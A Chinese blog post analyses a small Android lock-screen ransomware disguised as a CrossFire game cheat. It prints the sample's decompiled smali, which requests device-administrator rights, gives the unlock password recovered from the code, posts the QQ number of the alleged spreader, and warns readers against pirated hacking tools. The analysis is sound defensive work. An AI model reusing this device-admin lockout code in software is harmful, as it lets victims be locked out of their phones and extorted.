事情的起因是这样的，群里有位小朋友的手机被锁了，问及原因，原来是下载了一个名叫“cf外挂助手激活版”的这么一个软件，我收到了这份软件之后看到他是这样的...

emmm....才二百多kb，看来这是个不折不扣的小白了

从大小上来分析，只有二百多kb的“外挂”肯定是有猫腻的

从名字上来看，也很有问题，接下来我果断百度了下这个名字

emmmmm...........这样一来便更加深了我对他小白的印象

接下来我将这个文件上传到哈勃分析系统（https://habo.qq.com/）

得出文件MD5值：703b33a0def90c8d689881017878ae2d 百度搜索没有任何有关此MD5的信息，接下来进行逆向工作

工具：Android killer

将.apk文件放入Android killer中，发现入口M，查看代码信息：

.class public Lcom/h/M;
.super Landroid/app/Activity;
.source "M.java"


# direct methods
.method public constructor <init>()V
    .locals 3

    .prologue
    .line 25
    move-object v0, p0

    move-object v2, v0

    invoke-direct {v2}, Landroid/app/Activity;-><init>()V

    return-void
.end method

.method private activiteDevice()V
    .locals 13
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

    .prologue
    .line 19
    move-object v0, p0

    new-instance v5, Landroid/content/Intent;

    move-object v12, v5

    move-object v5, v12

    move-object v6, v12

    const-string v7, "android.app.action.ADD_DEVICE_ADMIN"

    invoke-direct {v6, v7}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V

    move-object v1, v5

    .line 20
    new-instance v5, Landroid/content/ComponentName;

    move-object v12, v5

    move-object v5, v12

    move-object v6, v12

    move-object v7, v0

    :try_start_0
    const-string v8, "com.h.MyAdmin"

    invoke-static {v8}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
    :try_end_0
    .catch Ljava/lang/ClassNotFoundException; {:try_start_0 .. :try_end_0} :catch_0

    move-result-object v8

    invoke-direct {v6, v7, v8}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

    move-object v2, v5

    .line 21
    move-object v5, v1

    const-string v6, "android.app.extra.DEVICE_ADMIN"

    move-object v7, v2

    invoke-virtual {v5, v6, v7}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;

    move-result-object v5

    .line 24
    move-object v5, v0

    move-object v6, v1

    const/4 v7, 0x0

    invoke-virtual {v5, v6, v7}, Lcom/h/M;->startActivityForResult(Landroid/content/Intent;I)V

    return-void

    .line 20
    :catch_0
    move-exception v5

    move-object v3, v5

    new-instance v5, Ljava/lang/NoClassDefFoundError;

    move-object v12, v5

    move-object v5, v12

    move-object v6, v12

    move-object v7, v3

    invoke-virtual {v7}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;

    move-result-object v7

    invoke-direct {v6, v7}, Ljava/lang/NoClassDefFoundError;-><init>(Ljava/lang/String;)V

    throw v5
.end method


# virtual methods
.method public onCreate(Landroid/os/Bundle;)V
    .locals 5
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "(",
            "Landroid/os/Bundle;",
            ")V"
        }
    .end annotation

    .annotation runtime Ljava/lang/Override;
    .end annotation

    .prologue
    move-object v0, p0

    move-object v1, p1

    move-object v3, v0

    invoke-static {v3}, LLogCatBroadcaster;->start(Landroid/content/Context;)V

    .line 13
    move-object v3, v0

    move-object v4, v1

    invoke-super {v3, v4}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    .line 14
    move-object v3, v0

    invoke-direct {v3}, Lcom/h/M;->activiteDevice()V

    return-void
.end method

未发现有意义的线索，接下来尝试搜索“序列号”

bingo!!只有一个搜索结果,嗅到了成功的味道

nice，成功找到密码：beautifulflower，前提是得使得序列号为0，这里就需要手机进行双清操作了，没办法，谁让贪小便宜呢

顺便挂下传播勒索软件人的qq:543892683，相信这也不是他本人做的，应该是网上找的一键生成程序

顺便告诫下大家，莫贪小便宜，不要随便下群里所谓的“黑客工具”“盗号软件”“辅助外挂”之类的东西，十有八九都是有病毒的